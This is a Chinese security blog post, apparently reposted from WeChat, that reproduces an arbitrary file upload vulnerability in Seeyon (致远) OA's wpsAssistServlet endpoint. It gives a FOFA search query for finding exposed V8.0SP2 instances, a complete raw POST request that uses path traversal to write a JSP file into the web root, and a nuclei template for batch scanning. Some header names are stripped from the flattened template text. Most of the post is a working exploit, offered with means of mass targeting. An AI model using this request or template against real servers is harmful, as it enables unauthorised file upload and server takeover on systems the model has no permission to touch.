0x01免责声明
技术文章仅供参考学习,请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。
0x02 影响版本
指纹信息:
fofa:app="致远互联-OA" && title="V8.0SP2"
0x03 漏洞复现
-
wpsAssistServlet接口任意文件上传
致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限
数据包:
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/qqq.jsp&fileId=2 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 219Content-Type: multipart/form-data; boundary=a4d7586ac9d50625dee11e86fa69bc71--a4d7586ac9d50625dee11e86fa69bc71Content-Disposition: form-data; name="upload"; filename="123.txt"Content-Type: application/vnd.ms-excel<% out.println("123123");%>--a4d7586ac9d50625dee11e86fa69bc71--
为了方便批量检测写了nuclei插件
脚本如下:
id: zhiyuan-wpsAssistServlet-Uploadinfo:name: zhiyuan-wpsAssistServlet-Uploadauthor: Kokoxcaseverity: criticaltags: zhiyuan-Uploadhttp:raw:|POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/qq.jsp&fileId=2 HTTP/1.1Host: {{Hostname}}: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1): gzip, deflateAccept: */*Connection: close: 217: multipart/form-data; boundary=a4d7586ac9d50625dee11e86fa69bc71--a4d7586ac9d50625dee11e86fa69bc71: form-data; name="upload"; filename="123.xls": application/vnd.ms-excelout.println("123123");%>--a4d7586ac9d50625dee11e86fa69bc71--|GET /qq.jsp HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Accept: */*: gzip, deflate, br: zh-CN,zh;q=0.9Connection: close: application/x-www-form-urlencoded: 1: andmatchers:type: dsldsl:"status_code==200 && contains(body,'123123')"
原文始发于微信公众号(Kokoxca安全):致远OA文件上传漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论